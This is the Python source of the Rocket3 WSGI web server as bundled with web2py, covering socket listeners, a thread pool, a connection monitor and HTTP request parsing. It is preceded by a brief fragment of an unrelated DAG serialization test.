assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
|
__init__.py
|
# -*- coding: utf-8 -*-
# This file is part of the Rocket Web Server
# Copyright (c) 2011 Timothy Farrell
# Modified by Massimo Di Pierro
# Removed python2 support and dependencies
# Import System Modules
import sys
import errno
import socket
import signal
import logging
import platform
import io
import urllib.parse
import time
import select
import threading
import traceback
import queue
import datetime
import os
import re
from wsgiref.headers import Headers
from wsgiref.util import FileWrapper
from email.utils import formatdate
from concurrent.futures import Future, ThreadPoolExecutor
from concurrent.futures.thread import _WorkItem
try:
import ssl
has_ssl = True
except ImportError:
has_ssl = False
class SSLError(socket.error):
pass
class NullHandler(logging.Handler):
"""A Logging handler to prevent library errors."""
def emit(self, record):
pass
log = logging.getLogger("Rocket")
log.addHandler(NullHandler())
# Define Constants
__version__ = "1.3"
SERVER_NAME = socket.gethostname()
SERVER_SOFTWARE = "Rocket3 %s" % __version__
HTTP_SERVER_SOFTWARE = "%s Python/%s" % (SERVER_SOFTWARE, sys.version.split(" ")[0])
BUF_SIZE = 16384
SOCKET_TIMEOUT = 10 # in secs
THREAD_STOP_CHECK_INTERVAL = (
1 # in secs, How often should threads check for a server stop message?
)
if hasattr(sys, "frozen"):
# py2installer
IS_JYTHON = False
else:
IS_JYTHON = platform.system() == "Java" # Handle special cases for Jython
IGNORE_ERRORS_ON_CLOSE = set([errno.ECONNABORTED, errno.ECONNRESET])
DEFAULT_LISTEN_QUEUE_SIZE = 5
DEFAULT_MIN_THREADS = 10
DEFAULT_MAX_THREADS = 0
DEFAULTS = dict(
LISTEN_QUEUE_SIZE=DEFAULT_LISTEN_QUEUE_SIZE,
MIN_THREADS=DEFAULT_MIN_THREADS,
MAX_THREADS=DEFAULT_MAX_THREADS,
)
__all__ = [
"__version__" "SERVER_SOFTWARE",
"HTTP_SERVER_SOFTWARE",
"BUF_SIZE",
"IS_JYTHON",
"IGNORE_ERRORS_ON_CLOSE",
"DEFAULTS",
"Rocket3",
"SERVER_NAME",
"NullHandler",
]
class Connection:
__slots__ = [
"setblocking",
"sendall",
"shutdown",
"makefile",
"fileno",
"client_addr",
"client_port",
"server_port",
"socket",
"start_time",
"ssl",
"secure",
"recv",
"send",
"read",
"write",
]
def __init__(self, sock_tuple, port, secure=False):
self.client_addr, self.client_port = sock_tuple[1][:2]
self.server_port = port
self.socket = sock_tuple[0]
self.start_time = time.time()
self.ssl = has_ssl and isinstance(self.socket, ssl.SSLSocket)
self.secure = secure
if IS_JYTHON:
# In Jython we must set TCP_NODELAY here since it does not
# inherit from the listening socket.
# See: http://bugs.jython.org/issue1309
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.settimeout(SOCKET_TIMEOUT)
self.shutdown = self.socket.shutdown
self.fileno = self.socket.fileno
self.setblocking = self.socket.setblocking
self.recv = self.socket.recv
self.send = self.socket.send
self.makefile = self.socket.makefile
if sys.platform == "darwin":
self.sendall = self._sendall_darwin
else:
self.sendall = self.socket.sendall
def _sendall_darwin(self, buf):
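        # sendall() replacement for macOS, where send() on a socket with a
        # timeout can bail out with EAGAIN mid-transfer; keep sending the
        # remaining bytes and return the number of bytes written.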
pending = len(buf)
offset = 0
while pending:
try:
sent = self.socket.send(buf[offset:])
pending -= sent
offset += sent
except socket.error:
info = sys.exc_info()
if info[1].args[0] != errno.EAGAIN:
raise
return offset
# FIXME - this is not ready for prime-time yet.
# def makefile(self, buf_size=BUF_SIZE):
# return FileLikeSocket(self, buf_size)
def close(self):
if hasattr(self.socket, "_sock"):
try:
self.socket._sock.close()
except socket.error:
info = sys.exc_info()
                if info[1].args[0] != errno.EBADF:
raise info[1]
else:
pass
self.socket.close()
class FileLikeSocket:
def __init__(self, conn, buf_size=BUF_SIZE):
self.conn = conn
self.buf_size = buf_size
self.buffer = io.StringIO()
self.content_length = None
if self.conn.socket.gettimeout() == 0.0:
self.read = self.non_blocking_read
else:
self.read = self.blocking_read
def recv(self, size):
while True:
try:
return self.conn.recv(size)
except socket.error:
exc = sys.exc_info()
e = exc[1]
# FIXME - Don't raise socket_errors_nonblocking or socket_error_eintr
if e.args[0] not in set():
raise
def next(self):
data = self.readline()
if data == "":
raise StopIteration
return data
def non_blocking_read(self, size=None):
# Shamelessly adapted from Cherrypy!
bufr = self.buffer
bufr.seek(0, 2)
if size is None:
while True:
data = self.recv(self.buf_size)
if not data:
break
bufr.write(data)
self.buffer = io.StringIO()
return bufr.getvalue()
else:
buf_len = self.buffer.tell()
if buf_len >= size:
bufr.seek(0)
data = bufr.read(size)
self.buffer = io.StringIO(bufr.read())
return data
self.buffer = io.StringIO()
while True:
remaining = size - buf_len
data = self.recv(remaining)
if not data:
break
n = len(data)
if n == size and not buf_len:
return data
if n == remaining:
bufr.write(data)
del data
break
bufr.write(data)
buf_len += n
del data
return bufr.getvalue()
def blocking_read(self, length=None):
if length is None:
if self.content_length is not None:
length = self.content_length
else:
length = 1
try:
data = self.conn.recv(length)
except:
data = b""
return data
def readline(self):
data = b""
char = self.read(1)
while char not in (b"\n", b""):
data += char
char = self.read(1)
data += char
return data
def readlines(self, hint="ignored"):
return list(self)
def close(self):
self.conn = None
self.content_length = None
class WSGIFuture(Future):
def __init__(self, f_dict, *args, **kwargs):
Future.__init__(self, *args, **kwargs)
self.timeout = None
self._mem_dict = f_dict
self._lifespan = 30
self._name = None
self._start_time = time.time()
def set_running_or_notify_cancel(self):
if time.time() - self._start_time >= self._lifespan:
self.cancel()
else:
return super(WSGIFuture, self).set_running_or_notify_cancel()
def remember(self, name, lifespan=None):
self._lifespan = lifespan or self._lifespan
if name in self._mem_dict:
raise NameError(
'Cannot remember future by name "%s". ' % name
+ "A future already exists with that name."
)
self._name = name
self._mem_dict[name] = self
return self
def forget(self):
if self._name in self._mem_dict and self._mem_dict[self._name] is self:
del self._mem_dict[self._name]
self._name = None
class _WorkItem:
def __init__(self, future, fn, args, kwargs):
self.future = future
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
if not self.future.set_running_or_notify_cancel():
return
try:
result = self.fn(*self.args, **self.kwargs)
except BaseException:
e = sys.exc_info()[1]
self.future.set_exception(e)
else:
self.future.set_result(result)
class WSGIExecutor(ThreadPoolExecutor):
multithread = True
multiprocess = False
def __init__(self, *args, **kwargs):
ThreadPoolExecutor.__init__(self, *args, **kwargs)
self.futures = dict()
def submit(self, fn, *args, **kwargs):
if self._shutdown_lock.acquire():
if self._shutdown:
self._shutdown_lock.release()
raise RuntimeError("Cannot schedule new futures after shutdown")
f = WSGIFuture(self.futures)
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
self._adjust_thread_count()
self._shutdown_lock.release()
return f
else:
return False
class FuturesMiddleware:
"""Futures middleware that adds a Futures Executor to the environment"""
def __init__(self, app, threads=5):
self.app = app
self.executor = WSGIExecutor(threads)
def __call__(self, environ, start_response):
environ["wsgiorg.executor"] = self.executor
environ["wsgiorg.futures"] = self.executor.futures
return self.app(environ, start_response)
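# Illustrative sketch (not part of Rocket): one way a WSGI app might use the
# executor and futures dict that FuturesMiddleware injects into the environ.
# The app and task below are hypothetical; only the "wsgiorg.executor" and
# "wsgiorg.futures" keys and the remember() call come from the code above.
def _futures_demo_task(n):
    # Stand-in for some slow computation.
    return n * n
def _futures_demo_app(environ, start_response):
    executor = environ["wsgiorg.executor"]   # WSGIExecutor added by FuturesMiddleware
    futures = environ["wsgiorg.futures"]     # dict of futures remembered by name
    if "answer" not in futures:
        # Submit the work and remember it across requests (default 30s lifespan).
        executor.submit(_futures_demo_task, 7).remember("answer")
        body = b"started"
    else:
        f = futures["answer"]
        body = str(f.result()).encode("utf8") if f.done() else b"pending"
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [body]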
# Monolithic build...end of module: rocket/futures.py
# Monolithic build...start of module: rocket/listener.py
class Listener(threading.Thread):
"""The Listener class is a class responsible for accepting connections
and queuing them to be processed by a worker thread."""
def __init__(self, interface, queue_size, active_queue, *args, **kwargs):
threading.Thread.__init__(self, *args, **kwargs)
# Instance variables
self.active_queue = active_queue
self.interface = interface
self.addr = interface[0]
self.port = interface[1]
self.secure = len(interface) >= 4
self.clientcert_req = len(interface) == 5 and interface[4]
self.thread = None
self.ready = False
# Error Log
self.err_log = logging.getLogger("Rocket.Errors.Port%i" % self.port)
self.err_log.addHandler(NullHandler())
# Build the socket
if ":" in self.addr:
listener = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not listener:
self.err_log.error("Failed to get socket.")
return
if self.secure:
if not has_ssl:
self.err_log.error("ssl module required to serve HTTPS.")
return
elif not os.path.exists(interface[2]):
data = (interface[2], interface[0], interface[1])
self.err_log.error(
"Cannot find key file " "'%s'. Cannot bind to %s:%s" % data
)
return
elif not os.path.exists(interface[3]):
data = (interface[3], interface[0], interface[1])
self.err_log.error(
"Cannot find certificate file " "'%s'. Cannot bind to %s:%s" % data
)
return
if self.clientcert_req and not os.path.exists(interface[4]):
data = (interface[4], interface[0], interface[1])
self.err_log.error(
"Cannot find root ca certificate file "
"'%s'. Cannot bind to %s:%s" % data
)
return
# Set socket options
try:
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except:
msg = "Cannot share socket. Using %s:%i exclusively."
self.err_log.warning(msg % (self.addr, self.port))
try:
if not IS_JYTHON:
listener.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except:
msg = "Cannot set TCP_NODELAY, things might run a little slower"
self.err_log.warning(msg)
try:
listener.bind((self.addr, self.port))
except:
msg = "Socket %s:%i in use by other process and it won't share."
self.err_log.error(msg % (self.addr, self.port))
else:
# We want socket operations to timeout periodically so we can
# check if the server is shutting down
listener.settimeout(THREAD_STOP_CHECK_INTERVAL)
# Listen for new connections allowing queue_size number of
# connections to wait before rejecting a connection.
listener.listen(queue_size)
self.listener = listener
self.ready = True
def wrap_socket(self, sock):
try:
if self.clientcert_req:
ca_certs = self.interface[4]
cert_reqs = ssl.CERT_OPTIONAL
sock = ssl.wrap_socket(
sock,
keyfile=self.interface[2],
certfile=self.interface[3],
server_side=True,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
ssl_version=ssl.PROTOCOL_SSLv23,
)
else:
sock = ssl.wrap_socket(
sock,
keyfile=self.interface[2],
certfile=self.interface[3],
server_side=True,
ssl_version=ssl.PROTOCOL_SSLv23,
)
except SSLError:
# Generally this happens when an HTTP request is received on a
# secure socket. We don't do anything because it will be detected
# by Worker and dealt with appropriately.
pass
return sock
def start(self):
if not self.ready:
self.err_log.warning("Listener started when not ready.")
return
if self.thread is not None and self.thread.is_alive():
self.err_log.warning("Listener already running.")
return
self.thread = threading.Thread(target=self.listen, name="Port" + str(self.port))
self.thread.start()
def is_alive(self):
if self.thread is None:
return False
return self.thread.is_alive()
def join(self):
if self.thread is None:
return
self.ready = False
self.thread.join()
del self.thread
self.thread = None
self.ready = True
def listen(self):
if __debug__:
self.err_log.debug("Entering main loop.")
while True:
try:
sock, addr = self.listener.accept()
if self.secure:
sock = self.wrap_socket(sock)
self.active_queue.put(((sock, addr), self.interface[1], self.secure))
except socket.timeout:
# socket.timeout will be raised every
# THREAD_STOP_CHECK_INTERVAL seconds. When that happens,
# we check if it's time to die.
if not self.ready:
if __debug__:
self.err_log.debug("Listener exiting.")
return
else:
continue
except:
self.err_log.error(traceback.format_exc())
# Monolithic build...end of module: rocket/listener.py
# Monolithic build...start of module: rocket/main.py
# Setup Logging
class Rocket3:
"""The Rocket class is responsible for handling threads and accepting and
dispatching connections."""
def __init__(
self,
interfaces=("127.0.0.1", 8000),
method="wsgi",
app_info=None,
min_threads=None,
max_threads=None,
queue_size=None,
timeout=600,
handle_signals=True,
):
self.handle_signals = handle_signals
self.startstop_lock = threading.Lock()
self.timeout = timeout
if not isinstance(interfaces, list):
self.interfaces = [interfaces]
else:
self.interfaces = interfaces
if min_threads is None:
min_threads = DEFAULTS["MIN_THREADS"]
if max_threads is None:
max_threads = DEFAULTS["MAX_THREADS"]
if not queue_size:
if hasattr(socket, "SOMAXCONN"):
queue_size = socket.SOMAXCONN
else:
queue_size = DEFAULTS["LISTEN_QUEUE_SIZE"]
if max_threads and queue_size > max_threads:
queue_size = max_threads
if isinstance(app_info, dict):
app_info["server_software"] = SERVER_SOFTWARE
self.monitor_queue = queue.Queue()
self.active_queue = queue.Queue()
self._threadpool = ThreadPool(
get_method(method),
app_info=app_info,
active_queue=self.active_queue,
monitor_queue=self.monitor_queue,
min_threads=min_threads,
max_threads=max_threads,
)
# Build our socket listeners
self.listeners = [
Listener(i, queue_size, self.active_queue) for i in self.interfaces
]
        for ndx in range(len(self.listeners) - 1, -1, -1):
if not self.listeners[ndx].ready:
del self.listeners[ndx]
if not self.listeners:
log.critical("No interfaces to listen on...closing.")
sys.exit(1)
def _sigterm(self, signum, frame):
log.info("Received SIGTERM")
self.stop()
def _sighup(self, signum, frame):
log.info("Received SIGHUP")
self.restart()
def start(self, background=False):
log.info("Starting %s" % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Set up our shutdown signals
if self.handle_signals:
try:
signal.signal(signal.SIGTERM, self._sigterm)
signal.signal(signal.SIGUSR1, self._sighup)
except:
log.debug("This platform does not support signals.")
# Start our worker threads
self._threadpool.start()
# Start our monitor thread
self._monitor = Monitor(
self.monitor_queue, self.active_queue, self.timeout, self._threadpool
)
            self._monitor.daemon = True
self._monitor.start()
            # Describe each listener as addr:port, with '*' marking secure ports.
            str_extract = lambda l: (l.addr, l.port, "*" if l.secure else "")
msg = "Listening on sockets: "
msg += ", ".join(["%s:%i%s" % str_extract(l) for l in self.listeners])
log.info(msg)
for l in self.listeners:
l.start()
finally:
self.startstop_lock.release()
if background:
return
while self._monitor.is_alive():
try:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
except KeyboardInterrupt:
# Capture a keyboard interrupt when running from a console
break
except:
if self._monitor.is_alive():
log.error(traceback.format_exc())
continue
return self.stop()
def stop(self, stoplogging=False):
log.info("Stopping %s" % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Stop listeners
for l in self.listeners:
l.ready = False
# Encourage a context switch
time.sleep(0.01)
for l in self.listeners:
if l.is_alive():
l.join()
# Stop Monitor
self._monitor.stop()
if self._monitor.is_alive():
self._monitor.join()
# Stop Worker threads
self._threadpool.stop()
if stoplogging:
logging.shutdown()
msg = "Calling logging.shutdown() is now the responsibility of \
the application developer. Please update your \
applications to no longer call rocket.stop(True)"
try:
raise DeprecationWarning(msg)
except ImportError:
raise RuntimeError(msg)
finally:
self.startstop_lock.release()
def restart(self):
self.stop()
self.start()
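# Illustrative sketch (not part of Rocket): the interface tuples understood by
# Listener/Rocket3 above. Two elements give plain HTTP; adding key and
# certificate file paths enables HTTPS, and a fifth element (a CA bundle path)
# additionally requests client certificates. The paths and app below are
# hypothetical placeholders; the function is never called here.
def _interface_examples():
    http_interface = ("127.0.0.1", 8000)
    https_interface = ("0.0.0.0", 8443, "server.key", "server.crt")
    https_client_certs = ("0.0.0.0", 8444, "server.key", "server.crt", "ca.crt")
    return Rocket3(
        interfaces=[http_interface, https_interface, https_client_certs],
        method="wsgi",
        app_info={"wsgi_app": demo_app},
    )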
class Monitor(threading.Thread):
# Monitor worker class.
def __init__(
self, monitor_queue, active_queue, timeout, threadpool, *args, **kwargs
):
threading.Thread.__init__(self, *args, **kwargs)
self._threadpool = threadpool
# Instance Variables
self.monitor_queue = monitor_queue
self.active_queue = active_queue
self.timeout = timeout
self.log = logging.getLogger("Rocket.Monitor")
self.log.addHandler(NullHandler())
self.connections = set()
self.active = False
def run(self):
self.active = True
conn_list = list()
list_changed = False
# We need to make sure the queue is empty before we start
while not self.monitor_queue.empty():
self.monitor_queue.get()
if __debug__:
self.log.debug("Entering monitor loop.")
# Enter thread main loop
while self.active:
# Move the queued connections to the selection pool
while not self.monitor_queue.empty():
if __debug__:
self.log.debug('In "receive timed-out connections" loop.')
c = self.monitor_queue.get()
if c is None:
# A non-client is a signal to die
if __debug__:
self.log.debug("Received a death threat.")
self.stop()
break
self.log.debug("Received a timed out connection.")
if __debug__:
assert c not in self.connections
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it.
c.setblocking(False)
if __debug__:
self.log.debug("Adding connection to monitor list.")
self.connections.add(c)
list_changed = True
# Wait on those connections
if list_changed:
conn_list = list(self.connections)
list_changed = False
try:
if len(conn_list):
readable = select.select(
conn_list, [], [], THREAD_STOP_CHECK_INTERVAL
)[0]
else:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
readable = []
if not self.active:
break
# If we have any readable connections, put them back
for r in readable:
if __debug__:
self.log.debug("Restoring readable connection")
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it, but the rest of the code requires
# that it be in blocking mode.
r.setblocking(True)
r.start_time = time.time()
self.active_queue.put(r)
self.connections.remove(r)
list_changed = True
except:
if self.active:
raise
else:
break
# If we have any stale connections, kill them off.
if self.timeout:
now = time.time()
stale = set()
for c in self.connections:
if (now - c.start_time) >= self.timeout:
stale.add(c)
for c in stale:
self.connections.remove(c)
list_changed = True
try:
c.close()
finally:
del c
# Dynamically resize the threadpool to adapt to our changing needs.
self._threadpool.dynamic_resize()
def stop(self):
self.active = False
if __debug__:
self.log.debug("Flushing waiting connections")
while self.connections:
c = self.connections.pop()
try:
c.close()
finally:
del c
if __debug__:
self.log.debug("Flushing queued connections")
while not self.monitor_queue.empty():
c = self.monitor_queue.get()
if c is None:
continue
try:
c.close()
finally:
del c
# Place a None sentry value to cause the monitor to die.
self.monitor_queue.put(None)
# Monolithic build...end of module: rocket/monitor.py
# Monolithic build...start of module: rocket/threadpool.py
# Setup Logging
log = logging.getLogger("Rocket.Errors.ThreadPool")
log.addHandler(NullHandler())
class ThreadPool:
"""The ThreadPool class is a container class for all the worker threads. It
manages the number of actively running threads."""
def __init__(
self,
method,
app_info,
active_queue,
monitor_queue,
min_threads=DEFAULTS["MIN_THREADS"],
max_threads=DEFAULTS["MAX_THREADS"],
):
if __debug__:
log.debug("Initializing ThreadPool.")
self.check_for_dead_threads = 0
self.active_queue = active_queue
self.worker_class = method
self.min_threads = min_threads
self.max_threads = max_threads
self.monitor_queue = monitor_queue
self.stop_server = False
self.alive = False
# TODO - Optimize this based on some real-world usage data
self.grow_threshold = int(max_threads / 10) + 2
if not isinstance(app_info, dict):
app_info = dict()
if app_info.get("futures"):
app_info["executor"] = WSGIExecutor(max([DEFAULTS["MIN_THREADS"], 2]))
app_info.update(max_threads=max_threads, min_threads=min_threads)
self.min_threads = min_threads
self.app_info = app_info
self.threads = set()
def start(self):
self.stop_server = False
if __debug__:
log.debug("Starting threads.")
self.grow(self.min_threads)
self.alive = True
def stop(self):
self.alive = False
if __debug__:
log.debug("Stopping threads.")
self.stop_server = True
# Prompt the threads to die
self.shrink(len(self.threads))
# Stop futures initially
if self.app_info.get("futures"):
if __debug__:
log.debug(
"Future executor is present. Python will not "
"exit until all jobs have finished."
)
self.app_info["executor"].shutdown(wait=False)
# Give them the gun
# active_threads = [t for t in self.threads if t.is_alive()]
# while active_threads:
# t = active_threads.pop()
# t.kill()
# Wait until they pull the trigger
for t in self.threads:
if t.is_alive():
t.join()
# Clean up the mess
self.bring_out_your_dead()
def bring_out_your_dead(self):
# Remove dead threads from the pool
dead_threads = [t for t in self.threads if not t.is_alive()]
for t in dead_threads:
if __debug__:
log.debug("Removing dead thread: %s." % t.getName())
self.threads.remove(t)
self.check_for_dead_threads -= len(dead_threads)
def grow(self, amount=None):
if self.stop_server:
return
if not amount:
amount = self.max_threads
if self.alive:
amount = min([amount, self.max_threads - len(self.threads)])
if __debug__:
log.debug("Growing by %i." % amount)
for x in range(amount):
worker = self.worker_class(
self.app_info, self.active_queue, self.monitor_queue
)
            worker.daemon = True
self.threads.add(worker)
worker.start()
def shrink(self, amount=1):
if __debug__:
log.debug("Shrinking by %i." % amount)
self.check_for_dead_threads += amount
for x in range(amount):
self.active_queue.put(None)
def dynamic_resize(self):
if self.max_threads > self.min_threads or self.max_threads == 0:
if self.check_for_dead_threads > 0:
self.bring_out_your_dead()
queueSize = self.active_queue.qsize()
threadCount = len(self.threads)
if __debug__:
log.debug(
"Examining ThreadPool. %i threads and %i Q'd conxions"
% (threadCount, queueSize)
)
if queueSize == 0 and threadCount > self.min_threads:
self.shrink()
elif queueSize > self.grow_threshold:
self.grow(queueSize)
# Monolithic build...end of module: rocket/threadpool.py
# Monolithic build...start of module: rocket/worker.py
# Define Constants
re_SLASH = re.compile("%2F", re.IGNORECASE)
re_REQUEST_LINE = re.compile(
r"""^
(?P<method>OPTIONS|GET|HEAD|POST|PUT|DELETE|PATCH|TRACE|CONNECT) # Req Method
\ # single space
(
(?P<scheme>[^:/]+) # Scheme
(://) #
(?P<host>[^/]+) # Host
)? #
(?P<path>(\*|/[^ \?]*)) # Path
(\? (?P<query_string>[^ ]*))? # Query String
\ # single space
(?P<protocol>HTTPS?/1\.[01]) # Protocol
$
""",
re.X,
)
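# Illustrative note (not part of Rocket): groups extracted by re_REQUEST_LINE
# from a typical request line; the sample line is hypothetical.
#
#   re_REQUEST_LINE.match("GET /search?q=rocket HTTP/1.1").groupdict()
#   -> {'method': 'GET', 'scheme': None, 'host': None,
#       'path': '/search', 'query_string': 'q=rocket', 'protocol': 'HTTP/1.1'}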
LOG_LINE = '%(client_ip)s - "%(request_line)s" - %(status)s %(size)s'
RESPONSE = """\
%s %s
Content-Length: %i
Content-Type: %s
%s
"""
if IS_JYTHON:
HTTP_METHODS = set(
["OPTIONS", "GET", "HEAD", "POST", "PUT", "DELETE", "TRACE", "CONNECT"]
)
class Worker(threading.Thread):
"""The Worker class is a base class responsible for receiving connections
and (a subclass) will run an application to process the the connection"""
def __init__(self, app_info, active_queue, monitor_queue, *args, **kwargs):
threading.Thread.__init__(self, *args, **kwargs)
# Instance Variables
self.app_info = app_info
self.active_queue = active_queue
self.monitor_queue = monitor_queue
self.size = 0
self.status = "200 OK"
self.closeConnection = True
self.request_line = ""
self.protocol = "HTTP/1.1"
# Request Log
self.req_log = logging.getLogger("Rocket.Requests")
self.req_log.addHandler(NullHandler())
# Error Log
self.err_log = logging.getLogger("Rocket.Errors." + self.getName())
self.err_log.addHandler(NullHandler())
def _handleError(self, typ, val, tb):
if typ == SSLError:
if "timed out" in str(val.args[0]):
typ = SocketTimeout
if typ == SocketTimeout:
if __debug__:
self.err_log.debug("Socket timed out")
self.monitor_queue.put(self.conn)
return True
if typ == SocketClosed:
self.closeConnection = True
if __debug__:
self.err_log.debug("Client closed socket")
return False
if typ == BadRequest:
self.closeConnection = True
if __debug__:
self.err_log.debug("Client sent a bad request")
return True
if typ == socket.error:
self.closeConnection = True
if val.args[0] in IGNORE_ERRORS_ON_CLOSE:
if __debug__:
self.err_log.debug(
"Ignorable socket Error received..." "closing connection."
)
return False
else:
self.status = "999 Utter Server Failure"
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error(
"Unhandled Error when serving " "connection:\n" + "\n".join(tb_fmt)
)
return False
self.closeConnection = True
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error("\n".join(tb_fmt))
self.send_response("500 Server Error")
return False
def run(self):
if __debug__:
self.err_log.debug("Entering main loop.")
# Enter thread main loop
while True:
conn = self.active_queue.get()
if not conn:
# A non-client is a signal to die
if __debug__:
self.err_log.debug("Received a death threat.")
return conn
if isinstance(conn, tuple):
conn = Connection(*conn)
self.conn = conn
if conn.ssl != conn.secure:
self.err_log.info("Received HTTP connection on HTTPS port.")
self.send_response("400 Bad Request")
self.closeConnection = True
conn.close()
continue
else:
if __debug__:
self.err_log.debug("Received a connection.")
self.closeConnection = False
# Enter connection serve loop
while True:
if __debug__:
self.err_log.debug("Serving a request")
try:
self.run_app(conn)
except:
exc = sys.exc_info()
handled = self._handleError(*exc)
if handled:
break
finally:
if self.request_line:
log_info = dict(
client_ip=conn.client_addr,
time=datetime.datetime.now().strftime("%c"),
status=self.status.split(" ")[0],
size=self.size,
request_line=self.request_line,
)
self.req_log.info(LOG_LINE % log_info)
if self.closeConnection:
try:
conn.close()
except:
self.err_log.error(str(traceback.format_exc()))
break
def run_app(self, conn):
        # Must be overridden with a method that reads the request from the socket
# and sends a response.
self.closeConnection = True
raise NotImplementedError("Overload this method!")
def send_response(self, status):
stat_msg = status.split(" ", 1)[1]
msg = RESPONSE % (self.protocol, status, len(stat_msg), "text/plain", stat_msg)
try:
self.conn.sendall(msg.encode("utf8"))
except socket.timeout:
self.closeConnection = True
msg = 'Tried to send "%s" to client but received timeout error'
self.err_log.error(msg % status)
except socket.error:
self.closeConnection = True
msg = 'Tried to send "%s" to client but received socket error'
self.err_log.error(msg % status)
def read_request_line(self, sock_file):
self.request_line = ""
try:
# Grab the request line
d = sock_file.readline()
d = d.decode("ISO-8859-1")
if d == "\r\n":
# Allow an extra NEWLINE at the beginning per HTTP 1.1 spec
if __debug__:
self.err_log.debug("Client sent newline")
d = sock_file.readline()
d = d.decode("ISO-8859-1")
except socket.timeout:
raise SocketTimeout("Socket timed out before request.")
except TypeError:
raise SocketClosed(
"SSL bug caused closure of socket. See "
'"https://groups.google.com/d/topic/web2py/P_Gw0JxWzCs".'
)
d = d.strip()
if not d:
if __debug__:
self.err_log.debug("Client did not send a recognizable request.")
raise SocketClosed("Client closed socket.")
self.request_line = d
# NOTE: I've replaced the traditional method of procedurally breaking
# apart the request line with a (rather unsightly) regular expression.
# However, Java's regexp support sucks so bad that it actually takes
# longer in Jython to process the regexp than procedurally. So I've
# left the old code here for Jython's sake...for now.
if IS_JYTHON:
return self._read_request_line_jython(d)
match = re_REQUEST_LINE.match(d)
if not match:
self.send_response("400 Bad Request")
raise BadRequest
req = match.groupdict()
for k, v in req.items():
if not v:
req[k] = ""
if k == "path":
req["path"] = r"%2F".join(
[urllib.parse.unquote(x) for x in re_SLASH.split(v)]
)
self.protocol = req["protocol"]
return req
def _read_request_line_jython(self, d):
d = d.strip()
try:
method, uri, proto = d.split(" ")
if (
not proto.startswith("HTTP")
or proto[-3:] not in ("1.0", "1.1")
or method not in HTTP_METHODS
):
self.send_response("400 Bad Request")
raise BadRequest
except ValueError:
self.send_response("400 Bad Request")
raise BadRequest
req = dict(method=method, protocol=proto)
scheme = ""
host = ""
if uri == "*" or uri.startswith("/"):
path = uri
elif "://" in uri:
scheme, rest = uri.split("://")
host, path = rest.split("/", 1)
path = "/" + path
else:
self.send_response("400 Bad Request")
raise BadRequest
query_string = ""
if "?" in path:
path, query_string = path.split("?", 1)
path = r"%2F".join([urllib.parse.unquote(x) for x in re_SLASH.split(path)])
req.update(
path=path, query_string=query_string, scheme=scheme.lower(), host=host
)
return req
def read_headers(self, sock_file):
try:
headers = dict()
lname = None
lval = None
while True:
l = sock_file.readline()
try:
l = str(l, "ISO-8859-1")
except UnicodeDecodeError:
self.err_log.warning("Client sent invalid header: " + repr(l))
if l.strip().replace("\0", "") == "":
break
if l[0] in " \t" and lname:
# Some headers take more than one line
lval += " " + l.strip()
else:
# HTTP header values are latin-1 encoded
l = l.split(":", 1)
# HTTP header names are us-ascii encoded
lname = l[0].strip().upper().replace("-", "_")
lval = l[-1].strip()
headers[str(lname)] = str(lval)
except socket.timeout:
raise SocketTimeout("Socket timed out before request.")
return headers
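# Illustrative note (not part of Rocket): read_headers() upper-cases header
# names and replaces '-' with '_', so a request containing, for example,
#
#   Content-Type: text/html
#   X-Custom-Header: 1
#
# yields {"CONTENT_TYPE": "text/html", "X_CUSTOM_HEADER": "1"}, and
# build_environ() further below prefixes each key with "HTTP_".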
class SocketTimeout(Exception):
"""Exception for when a socket times out between requests."""
pass
class BadRequest(Exception):
"""Exception for when a client sends an incomprehensible request."""
pass
class SocketClosed(Exception):
"""Exception for when a socket is closed by the client."""
pass
class ChunkedReader:
def __init__(self, sock_file):
self.stream = sock_file
self.chunk_size = 0
def _read_header(self):
chunk_len = ""
try:
while "" == chunk_len:
chunk_len = self.stream.readline().strip()
return int(chunk_len, 16)
except ValueError:
return 0
def read(self, size):
data = b""
chunk_size = self.chunk_size
while size:
if not chunk_size:
chunk_size = self._read_header()
if size < chunk_size:
data += self.stream.read(size)
chunk_size -= size
break
else:
if not chunk_size:
break
data += self.stream.read(chunk_size)
size -= chunk_size
chunk_size = 0
self.chunk_size = chunk_size
return data
def readline(self):
data = b""
c = self.read(1)
while c and c != b"\n":
data += c
c = self.read(1)
data += c
return data
def readlines(self):
yield self.readline()
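# Illustrative note (not part of Rocket): ChunkedReader only needs an object
# with read()/readline(), so an io.BytesIO holding a chunked body demonstrates
# the decoding; the body below is a hypothetical example.
#
#   import io
#   body = io.BytesIO(b"5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n")
#   ChunkedReader(body).read(11)   # -> b'hello world'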
def get_method(method):
methods = dict(wsgi=WSGIWorker)
return methods[method.lower()]
# Monolithic build...end of module: rocket/worker.py
# Monolithic build...start of module: rocket/methods/__init__.py
# Monolithic build...end of module: rocket/methods/__init__.py
# Monolithic build...start of module: rocket/methods/wsgi.py
# Define Constants
NEWLINE = b"\r\n"
HEADER_RESPONSE = """HTTP/1.1 %s\r\n%s"""
BASE_ENV = {
"SERVER_NAME": SERVER_NAME,
